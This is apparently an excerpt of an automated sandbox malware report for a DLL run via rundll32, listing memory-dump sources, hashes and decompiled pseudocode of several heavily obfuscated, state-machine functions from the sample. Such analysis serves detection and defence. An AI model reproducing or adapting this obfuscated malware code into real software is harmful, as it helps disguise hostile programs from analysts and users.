                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 431132790-0
                                                                                                                      • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                      • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100134F0 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Iconic
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 110040809-0
                                                                                                                      • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                      • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 003564F1 Relevance: 1.4, Strings: 1, Instructions: 152COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E003564F1(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t137;
				void* _t150;
				intOrPtr _t151;
				void* _t157;
				intOrPtr* _t172;
				intOrPtr _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int* _t179;

				_t155 = _a4;
				_push(_a8);
				_t172 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t137);
				_v48 = 0x93d665;
				_t179 =  &(( &_v100)[4]);
				_t173 = 0;
				_v44 = 0;
				_t157 = 0x9466795;
				_v40 = 0;
				_v92 = 0xc35ba1;
				_v92 = _v92 + 0xcdf2;
				_t174 = 0x24;
				_v92 = _v92 / _t174;
				_v92 = _v92 ^ 0x5a7ecd09;
				_v92 = _v92 ^ 0x5a7bbfe7;
				_v56 = 0x6ac612;
				_v56 = _v56 ^ 0x41bcc0f7;
				_v56 = _v56 + 0xffffadf0;
				_v56 = _v56 ^ 0x41d5b4d5;
				_v100 = 0xa175c9;
				_v100 = _v100 | 0xb7da1d5b;
				_v100 = _v100 ^ 0x832b9b3a;
				_v100 = _v100 ^ 0xfbd8173c;
				_v100 = _v100 ^ 0xcf0e566f;
				_v68 = 0xb337e;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 + 0xffffb10e;
				_v68 = _v68 ^ 0xfff97d65;
				_v72 = 0x51a563;
				_v72 = _v72 | 0x5dd657cd;
				_v72 = _v72 >> 0xb;
				_v72 = _v72 ^ 0x0003baa1;
				_v76 = 0xe50ce8;
				_t175 = 0x4f;
				_v76 = _v76 / _t175;
				_v76 = _v76 | 0x5f70b90d;
				_v76 = _v76 ^ 0x5f701ab2;
				_v80 = 0xbdb868;
				_v80 = _v80 * 0x3f;
				_v80 = _v80 + 0x8645;
				_v80 = _v80 | 0x0d4f9aa3;
				_v80 = _v80 ^ 0x2ff450e8;
				_v52 = 0x17e057;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x00020d27;
				_v60 = 0xa13b54;
				_v60 = _v60 * 0x33;
				_v60 = _v60 ^ 0x49292d47;
				_v60 = _v60 ^ 0x693c6a3c;
				_v84 = 0xcd99b1;
				_v84 = _v84 + 0x2d8d;
				_v84 = _v84 << 7;
				_v84 = _v84 + 0xffff7b1e;
				_v84 = _v84 ^ 0x66e29e95;
				_v88 = 0xe50b02;
				_v88 = _v88 ^ 0x6ddcea1b;
				_v88 = _v88 >> 0x10;
				_v88 = _v88 * 0x49;
				_v88 = _v88 ^ 0x001db712;
				_v64 = 0xb5c75b;
				_v64 = _v64 * 0x46;
				_t176 = 0x77;
				_v64 = _v64 / _t176;
				_v64 = _v64 ^ 0x006c56aa;
				_v96 = 0xaabe6e;
				_v96 = _v96 << 5;
				_v96 = _v96 + 0xffff8361;
				_v96 = _v96 << 3;
				_v96 = _v96 ^ 0xaab2b903;
				do {
					while(_t157 != 0x179a40a) {
						if(_t157 == 0x8ebb7f5) {
							_t151 =  *0x365c9c; // 0x0
							E0035D6C0(_v80, _v52, _v60, _t157, _v84, _v88,  &_v36, _t157, _v64, _v92, _v96,  *_t155,  *((intOrPtr*)(_t155 + 4)),  *((intOrPtr*)(_t151 + 8)));
							_t173 =  ==  ? 1 : _t173;
						} else {
							if(_t157 != 0x9466795) {
								goto L8;
							} else {
								_t157 = 0x179a40a;
								continue;
							}
						}
						L11:
						return _t173;
					}
					_push( *_t172);
					_t150 = E00351831(_v68, _v72,  &_v36, _v76, _t157,  *((intOrPtr*)(_t172 + 4)));
					_t179 =  &(_t179[6]);
					if(_t150 == 0) {
						_t157 = 0x49089dc;
						goto L8;
					} else {
						_t157 = 0x8ebb7f5;
						continue;
					}
					goto L11;
					L8:
				} while (_t157 != 0x49089dc);
				goto L11;
			}






























                                                                                                                      0x003564f5
                                                                                                                      0x003564fc
                                                                                                                      0x00356500
                                                                                                                      0x00356502
                                                                                                                      0x00356503
                                                                                                                      0x00356504
                                                                                                                      0x00356505
                                                                                                                      0x0035650a
                                                                                                                      0x00356512
                                                                                                                      0x00356515
                                                                                                                      0x00356519
                                                                                                                      0x0035651d
                                                                                                                      0x00356522
                                                                                                                      0x00356526
                                                                                                                      0x0035652e
                                                                                                                      0x0035653c
                                                                                                                      0x00356541
                                                                                                                      0x00356547
                                                                                                                      0x0035654f
                                                                                                                      0x00356557
                                                                                                                      0x0035655f
                                                                                                                      0x00356567
                                                                                                                      0x0035656f
                                                                                                                      0x00356577
                                                                                                                      0x0035657f
                                                                                                                      0x00356587
                                                                                                                      0x0035658f
                                                                                                                      0x00356597
                                                                                                                      0x0035659f
                                                                                                                      0x003565a7
                                                                                                                      0x003565ac
                                                                                                                      0x003565b4
                                                                                                                      0x003565bc
                                                                                                                      0x003565c4
                                                                                                                      0x003565cc
                                                                                                                      0x003565d1
                                                                                                                      0x003565d9
                                                                                                                      0x003565e5
                                                                                                                      0x003565e8
                                                                                                                      0x003565ec
                                                                                                                      0x003565f4
                                                                                                                      0x003565fc
                                                                                                                      0x00356609
                                                                                                                      0x0035660d
                                                                                                                      0x00356615
                                                                                                                      0x0035661d
                                                                                                                      0x00356625
                                                                                                                      0x0035662d
                                                                                                                      0x00356632
                                                                                                                      0x0035663a
                                                                                                                      0x00356647
                                                                                                                      0x0035664b
                                                                                                                      0x00356653
                                                                                                                      0x0035665b
                                                                                                                      0x00356663
                                                                                                                      0x0035666b
                                                                                                                      0x00356670
                                                                                                                      0x00356678
                                                                                                                      0x00356680
                                                                                                                      0x00356688
                                                                                                                      0x00356690
                                                                                                                      0x0035669a
                                                                                                                      0x0035669e
                                                                                                                      0x003566a6
                                                                                                                      0x003566b3
                                                                                                                      0x003566bf
                                                                                                                      0x003566c7
                                                                                                                      0x003566cb
                                                                                                                      0x003566d3
                                                                                                                      0x003566db
                                                                                                                      0x003566e0
                                                                                                                      0x003566e8
                                                                                                                      0x003566ed
                                                                                                                      0x003566f5
                                                                                                                      0x003566f5
                                                                                                                      0x003566ff
                                                                                                                      0x0035674a
                                                                                                                      0x0035677e
                                                                                                                      0x0035678f
                                                                                                                      0x00356701
                                                                                                                      0x00356707
                                                                                                                      0x00000000
                                                                                                                      0x00356709
                                                                                                                      0x00356709
                                                                                                                      0x00000000
                                                                                                                      0x00356709
                                                                                                                      0x00356707
                                                                                                                      0x00356793
                                                                                                                      0x0035679b
                                                                                                                      0x0035679b
                                                                                                                      0x0035670d
                                                                                                                      0x00356728
                                                                                                                      0x0035672d
                                                                                                                      0x00356732
                                                                                                                      0x0035673b
                                                                                                                      0x00000000
                                                                                                                      0x00356734
                                                                                                                      0x00356734
                                                                                                                      0x00000000
                                                                                                                      0x00356734
                                                                                                                      0x00000000
                                                                                                                      0x00356740
                                                                                                                      0x00356740
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <j<i
                                                                                                                      • API String ID: 0-2573498096
                                                                                                                      • Opcode ID: 9e53074713708ff7298afe18d4a1af6f75fb88c97a5962f59a9557456a9e907d
                                                                                                                      • Instruction ID: 114d8d1611347f927e3291a5d92d40314bd6068151c5ce1f0bc2bd6670575f52
                                                                                                                      • Opcode Fuzzy Hash: 9e53074713708ff7298afe18d4a1af6f75fb88c97a5962f59a9557456a9e907d
                                                                                                                      • Instruction Fuzzy Hash: 8A610FB15093419FC754CF25C98A81BFBE6FBC8B58F809A1EF58696220D3719A49CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00354B56 Relevance: 1.4, Strings: 1, Instructions: 131COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00354B56() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _t95;
				signed int _t101;
				signed int _t103;
				void* _t104;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				void* _t126;
				signed int _t127;
				signed int* _t128;

				_t128 =  &_v564;
				_v556 = 0x172e57;
				_v556 = _v556 ^ 0x73ef0dea;
				_t104 = 0x4d22871;
				_v556 = _v556 << 5;
				_v556 = _v556 ^ 0x7f0420db;
				_v564 = 0x28c43f;
				_t122 = 0x37;
				_v564 = _v564 / _t122;
				_v564 = _v564 ^ 0x0004b302;
				_t126 = 0;
				_v540 = 0xa3dd1;
				_v540 = _v540 >> 7;
				_v540 = _v540 ^ 0x000ead4a;
				_v548 = 0xb6c83;
				_v548 = _v548 >> 2;
				_v548 = _v548 ^ 0x000dd0d2;
				_v544 = 0xa789eb;
				_t123 = 0x5a;
				_v544 = _v544 / _t123;
				_v544 = _v544 ^ 0x000aafac;
				_v532 = 0x6a9d21;
				_t124 = 0x13;
				_t125 = _v564;
				_v532 = _v532 / _t124;
				_v532 = _v532 ^ 0x0003d3c1;
				_v528 = 0x3996e5;
				_v528 = _v528 >> 4;
				_v528 = _v528 ^ 0x0009e8d5;
				_t103 = _v564;
				_t127 = _v564;
				_v536 = 0xc5251e;
				_v536 = _v536 ^ 0x87fb489f;
				_v536 = _v536 ^ 0x87377a50;
				_v560 = 0x43b612;
				_v560 = _v560 >> 0xe;
				_v560 = _v560 ^ 0x7320a641;
				_v560 = _v560 ^ 0xd4a0e575;
				_v560 = _v560 ^ 0xa78970ff;
				_v552 = 0x3a31ae;
				_v552 = _v552 ^ 0x0baee347;
				_v552 = _v552 ^ 0x0b916be4;
				do {
					while(_t104 != 0x42ef3b0) {
						if(_t104 == 0x4d22871) {
							_t104 = 0xc70fe83;
							continue;
						} else {
							if(_t104 == 0x81a395a) {
								_v564 = 0x2f01d9;
								_v564 = _v564 + 0xd8f0;
								_v564 = _v564 ^ 0x2a08da2b;
								__eflags = _t103 - _v564;
								_t126 =  ==  ? 1 : _t126;
							} else {
								if(_t104 == 0x918a316) {
									_t103 = E00347677(_t127, _v536, _v560, _v552);
									_t104 = 0x81a395a;
									continue;
								} else {
									if(_t104 == 0xc70fe83) {
										_t101 = E0034C706();
										_t125 = _t101;
										__eflags = _t101;
										if(__eflags != 0) {
											_t104 = 0x42ef3b0;
											continue;
										}
									} else {
										if(_t104 != 0xea0747d) {
											goto L15;
										} else {
											_t127 = E00354FA8(_v544,  &_v524, _v532, _v528);
											_t104 = 0x918a316;
											continue;
										}
									}
								}
							}
						}
						L18:
						return _t126;
					}
					_t95 = E00361993(_v564, _v540, __eflags,  &_v524, _t104, _v548, _t125);
					_t128 =  &(_t128[4]);
					__eflags = _t95;
					if(__eflags == 0) {
						_t104 = 0xffaf3fd;
						goto L15;
					} else {
						_t104 = 0xea0747d;
						continue;
					}
					goto L18;
					L15:
					__eflags = _t104 - 0xffaf3fd;
				} while (__eflags != 0);
				goto L18;
			}
























                                                                                                                      0x00354b56
                                                                                                                      0x00354b5c
                                                                                                                      0x00354b66
                                                                                                                      0x00354b6e
                                                                                                                      0x00354b73
                                                                                                                      0x00354b78
                                                                                                                      0x00354b80
                                                                                                                      0x00354b90
                                                                                                                      0x00354b95
                                                                                                                      0x00354b9b
                                                                                                                      0x00354ba3
                                                                                                                      0x00354ba5
                                                                                                                      0x00354bad
                                                                                                                      0x00354bb2
                                                                                                                      0x00354bba
                                                                                                                      0x00354bc2
                                                                                                                      0x00354bc7
                                                                                                                      0x00354bcf
                                                                                                                      0x00354bdb
                                                                                                                      0x00354be0
                                                                                                                      0x00354be6
                                                                                                                      0x00354bee
                                                                                                                      0x00354bfa
                                                                                                                      0x00354bfd
                                                                                                                      0x00354c01
                                                                                                                      0x00354c05
                                                                                                                      0x00354c0d
                                                                                                                      0x00354c15
                                                                                                                      0x00354c1a
                                                                                                                      0x00354c22
                                                                                                                      0x00354c26
                                                                                                                      0x00354c2a
                                                                                                                      0x00354c32
                                                                                                                      0x00354c3a
                                                                                                                      0x00354c42
                                                                                                                      0x00354c4a
                                                                                                                      0x00354c4f
                                                                                                                      0x00354c57
                                                                                                                      0x00354c5f
                                                                                                                      0x00354c67
                                                                                                                      0x00354c6f
                                                                                                                      0x00354c77
                                                                                                                      0x00354c7f
                                                                                                                      0x00354c7f
                                                                                                                      0x00354c91
                                                                                                                      0x00354d1a
                                                                                                                      0x00000000
                                                                                                                      0x00354c97
                                                                                                                      0x00354c9d
                                                                                                                      0x00354d60
                                                                                                                      0x00354d6a
                                                                                                                      0x00354d73
                                                                                                                      0x00354d7f
                                                                                                                      0x00354d81
                                                                                                                      0x00354ca3
                                                                                                                      0x00354ca9
                                                                                                                      0x00354d0e
                                                                                                                      0x00354d10
                                                                                                                      0x00000000
                                                                                                                      0x00354cab
                                                                                                                      0x00354cb1
                                                                                                                      0x00354ce3
                                                                                                                      0x00354ce8
                                                                                                                      0x00354cea
                                                                                                                      0x00354cec
                                                                                                                      0x00354cf2
                                                                                                                      0x00000000
                                                                                                                      0x00354cf2
                                                                                                                      0x00354cb3
                                                                                                                      0x00354cb9
                                                                                                                      0x00000000
                                                                                                                      0x00354cbf
                                                                                                                      0x00354cd6
                                                                                                                      0x00354cd8
                                                                                                                      0x00000000
                                                                                                                      0x00354cd8
                                                                                                                      0x00354cb9
                                                                                                                      0x00354cb1
                                                                                                                      0x00354ca9
                                                                                                                      0x00354c9d
                                                                                                                      0x00354d85
                                                                                                                      0x00354d90
                                                                                                                      0x00354d90
                                                                                                                      0x00354d37
                                                                                                                      0x00354d3c
                                                                                                                      0x00354d3f
                                                                                                                      0x00354d41
                                                                                                                      0x00354d4d
                                                                                                                      0x00000000
                                                                                                                      0x00354d43
                                                                                                                      0x00354d43
                                                                                                                      0x00000000
                                                                                                                      0x00354d43
                                                                                                                      0x00000000
                                                                                                                      0x00354d52
                                                                                                                      0x00354d52
                                                                                                                      0x00354d52
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: s
                                                                                                                      • API String ID: 0-1867647943
                                                                                                                      • Opcode ID: 34bd5959cf2d6eb589c4a5b2399f6c39d3f0ab0d666f3f677d61167571982d03
                                                                                                                      • Instruction ID: f2f8b999191811a69e715ff091956c2052072fc3c9551adc1f8e45ff56a98a75
                                                                                                                      • Opcode Fuzzy Hash: 34bd5959cf2d6eb589c4a5b2399f6c39d3f0ab0d666f3f677d61167571982d03
                                                                                                                      • Instruction Fuzzy Hash: 3251BC712093419FC359DE61D59582BBBE1EFC4708F20891EF9969A260C770DA4ACF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034E86A Relevance: 1.4, Strings: 1, Instructions: 118COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0034E86A() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _t97;
				signed int _t99;
				intOrPtr _t100;
				void* _t105;
				signed int _t114;
				short* _t117;
				signed int* _t119;

				_t119 =  &_v564;
				_v560 = 0xce5cf0;
				_v560 = _v560 | 0x815fac8b;
				_t105 = 0x687a68b;
				_t114 = 0x3d;
				_v560 = _v560 / _t114;
				_v560 = _v560 ^ 0x02257571;
				_v552 = 0x865242;
				_v552 = _v552 * 0x34;
				_v552 = _v552 >> 6;
				_v552 = _v552 ^ 0x0066bbb6;
				_v524 = 0xc32fa5;
				_v524 = _v524 * 0x41;
				_v524 = _v524 ^ 0x3182565b;
				_v548 = 0xb61c38;
				_v548 = _v548 * 0x62;
				_v548 = _v548 | 0xd3f7f889;
				_v548 = _v548 ^ 0xd7f1c5f5;
				_v536 = 0xb1408a;
				_v536 = _v536 >> 3;
				_v536 = _v536 ^ 0x001ed817;
				_v556 = 0x4c3333;
				_v556 = _v556 + 0xffff679f;
				_v556 = _v556 >> 0xf;
				_v556 = _v556 ^ 0x000b6621;
				_v528 = 0x174ea7;
				_v528 = _v528 >> 8;
				_v528 = _v528 ^ 0x00085e65;
				_v540 = 0x951329;
				_v540 = _v540 ^ 0x02360ba7;
				_v540 = _v540 ^ 0x02aaf891;
				_v564 = 0x7a8127;
				_v564 = _v564 | 0x4a3ea7d2;
				_v564 = _v564 * 0x6d;
				_v564 = _v564 + 0xffffd056;
				_v564 = _v564 ^ 0xb7eba97a;
				_v532 = 0x65650b;
				_t97 = _v532 * 5;
				_v532 = _t97;
				_v532 = _v532 ^ 0x01f4ff6f;
				do {
					while(_t105 != 0xb436d6) {
						if(_t105 == 0x2c7b739) {
							_t100 =  *0x36520c; // 0x0
							__eflags = _t100 + 0x220;
							return E003508A0(_t117, _v540, _v564, _t100 + 0x220, _v532);
						}
						if(_t105 == 0x687a68b) {
							_t105 = 0xdf97892;
							continue;
						}
						_t125 = _t105 - 0xdf97892;
						if(_t105 != 0xdf97892) {
							goto L15;
						}
						_t97 = E003612A8(_t105, _v560, _t125, _v552, _v524,  &_v520);
						_t119 =  &(_t119[3]);
						_t105 = 0xb436d6;
					}
					_v544 = 0xaf74ff;
					_v544 = _v544 + 0xc134;
					_v544 = _v544 ^ 0x00b03631;
					_t99 = E0035BA68(_v548, _v536, _v556,  &_v520, _v528);
					_t119 =  &(_t119[3]);
					_t117 =  &_v520 + _t99 * 2;
					while(1) {
						_t97 =  &_v520;
						__eflags = _t117 - _t97;
						if(_t117 <= _t97) {
							break;
						}
						__eflags =  *_t117 - 0x5c;
						if( *_t117 != 0x5c) {
							L10:
							_t117 = _t117 - 2;
							__eflags = _t117;
							continue;
						}
						_t85 =  &_v544;
						 *_t85 = _v544 - 1;
						__eflags =  *_t85;
						if( *_t85 == 0) {
							__eflags = _t117;
							L14:
							_t105 = 0x2c7b739;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t105 - 0x787a9f3;
				} while (__eflags != 0);
				return _t97;
			}






















                                                                                                                      0x0034e86a
                                                                                                                      0x0034e870
                                                                                                                      0x0034e87a
                                                                                                                      0x0034e882
                                                                                                                      0x0034e891
                                                                                                                      0x0034e89e
                                                                                                                      0x0034e8a7
                                                                                                                      0x0034e8af
                                                                                                                      0x0034e8bc
                                                                                                                      0x0034e8c0
                                                                                                                      0x0034e8c5
                                                                                                                      0x0034e8cd
                                                                                                                      0x0034e8da
                                                                                                                      0x0034e8de
                                                                                                                      0x0034e8e6
                                                                                                                      0x0034e8f3
                                                                                                                      0x0034e8f7
                                                                                                                      0x0034e8ff
                                                                                                                      0x0034e907
                                                                                                                      0x0034e90f
                                                                                                                      0x0034e914
                                                                                                                      0x0034e91c
                                                                                                                      0x0034e924
                                                                                                                      0x0034e92c
                                                                                                                      0x0034e931
                                                                                                                      0x0034e939
                                                                                                                      0x0034e941
                                                                                                                      0x0034e946
                                                                                                                      0x0034e94e
                                                                                                                      0x0034e956
                                                                                                                      0x0034e95e
                                                                                                                      0x0034e966
                                                                                                                      0x0034e96e
                                                                                                                      0x0034e97f
                                                                                                                      0x0034e983
                                                                                                                      0x0034e98b
                                                                                                                      0x0034e993
                                                                                                                      0x0034e99b
                                                                                                                      0x0034e9a0
                                                                                                                      0x0034e9a4
                                                                                                                      0x0034e9ac
                                                                                                                      0x0034e9ac
                                                                                                                      0x0034e9b2
                                                                                                                      0x0034ea53
                                                                                                                      0x0034ea5a
                                                                                                                      0x00000000
                                                                                                                      0x0034ea6d
                                                                                                                      0x0034e9be
                                                                                                                      0x0034e9e1
                                                                                                                      0x00000000
                                                                                                                      0x0034e9e1
                                                                                                                      0x0034e9c0
                                                                                                                      0x0034e9c2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034e9d5
                                                                                                                      0x0034e9da
                                                                                                                      0x0034e9dd
                                                                                                                      0x0034e9dd
                                                                                                                      0x0034e9e5
                                                                                                                      0x0034e9f1
                                                                                                                      0x0034e9f9
                                                                                                                      0x0034ea12
                                                                                                                      0x0034ea1b
                                                                                                                      0x0034ea1e
                                                                                                                      0x0034ea32
                                                                                                                      0x0034ea32
                                                                                                                      0x0034ea36
                                                                                                                      0x0034ea38
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034ea23
                                                                                                                      0x0034ea27
                                                                                                                      0x0034ea2f
                                                                                                                      0x0034ea2f
                                                                                                                      0x0034ea2f
                                                                                                                      0x00000000
                                                                                                                      0x0034ea2f
                                                                                                                      0x0034ea29
                                                                                                                      0x0034ea29
                                                                                                                      0x0034ea29
                                                                                                                      0x0034ea2d
                                                                                                                      0x0034ea3c
                                                                                                                      0x0034ea3f
                                                                                                                      0x0034ea3f
                                                                                                                      0x00000000
                                                                                                                      0x0034ea3f
                                                                                                                      0x00000000
                                                                                                                      0x0034ea2d
                                                                                                                      0x00000000
                                                                                                                      0x0034ea41
                                                                                                                      0x0034ea41
                                                                                                                      0x0034ea41
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 33L
                                                                                                                      • API String ID: 0-1382935120
                                                                                                                      • Opcode ID: 04fc891c52c6a98fabd3b9d31d1bf0e54bbcd4cbf9786134227aa9e61012b2d2
                                                                                                                      • Instruction ID: fae5ea8181e05d790cd814122708000ccdf45c72a936faa5ac843e6d0bc37f3a
                                                                                                                      • Opcode Fuzzy Hash: 04fc891c52c6a98fabd3b9d31d1bf0e54bbcd4cbf9786134227aa9e61012b2d2
                                                                                                                      • Instruction Fuzzy Hash: E75154715083819BC798CF24C58582FBBE4FBC4758F904A1DF9869A260D374EA49CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00350D33 Relevance: 1.4, Strings: 1, Instructions: 111COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00350D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t64;
				void* _t81;
				void* _t85;
				signed int _t94;
				signed int _t95;
				void* _t97;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0034CF25(_t64);
				_v20 = 0xc35745;
				_t97 = 0;
				_t81 = 0xe709e41;
				_t94 = 0x4c;
				_v20 = _v20 / _t94;
				_v20 = _v20 ^ 0x00058dee;
				_v24 = 0xf1d8fd;
				_v24 = _v24 + 0xffffe7cd;
				_v24 = _v24 + 0xffff1b1a;
				_v24 = _v24 << 0xc;
				_v24 = _v24 ^ 0x0dbd879b;
				_v28 = 0xdb2a24;
				_v28 = _v28 + 0x4b2b;
				_v28 = _v28 | 0xa0f26509;
				_v28 = _v28 + 0x79c0;
				_v28 = _v28 ^ 0xa0fe0b2f;
				_v4 = 0xb750f2;
				_v4 = _v4 >> 0xe;
				_v4 = _v4 ^ 0x000727f7;
				_v8 = 0x72e718;
				_t95 = 0x6b;
				_v8 = _v8 / _t95;
				_v8 = _v8 ^ 0x00056d3a;
				_v12 = 0x47eeb9;
				_v12 = _v12 + 0xffffe987;
				_v12 = _v12 ^ 0x0043781c;
				_v16 = 0xdf1994;
				_v16 = _v16 + 0xffff4376;
				_v16 = _v16 ^ 0x00d54791;
				do {
					while(_t81 != 0x3b92be8) {
						if(_t81 == 0x73b901c) {
							E00363672();
							_t81 = 0xe212545;
							continue;
						} else {
							if(_t81 == 0x9bcb632) {
								if(E0035ACD3(_a8) != 0) {
									_t97 = 1;
								} else {
									_t81 = 0x73b901c;
									continue;
								}
							} else {
								if(_t81 == 0xe212545) {
									E003468DE(_v4, _v8, _v12, _v16,  *0x365c9c);
								} else {
									if(_t81 != 0xe709e41) {
										goto L13;
									} else {
										_push(_t81);
										_push(_t81);
										_t85 = 0x60;
										 *0x365c9c = E00353512(_t85);
										_t81 = 0x3b92be8;
										continue;
									}
								}
							}
						}
						L17:
						return _t97;
					}
					if(E00349A7D(_a12) == 0) {
						_t81 = 0xe212545;
						goto L13;
					} else {
						_t81 = 0x9bcb632;
						continue;
					}
					goto L17;
					L13:
				} while (_t81 != 0xf0e3ed);
				goto L17;
			}
















                                                                                                                      0x00350d3a
                                                                                                                      0x00350d3e
                                                                                                                      0x00350d42
                                                                                                                      0x00350d47
                                                                                                                      0x00350d48
                                                                                                                      0x00350d4d
                                                                                                                      0x00350d5e
                                                                                                                      0x00350d60
                                                                                                                      0x00350d71
                                                                                                                      0x00350d76
                                                                                                                      0x00350d7c
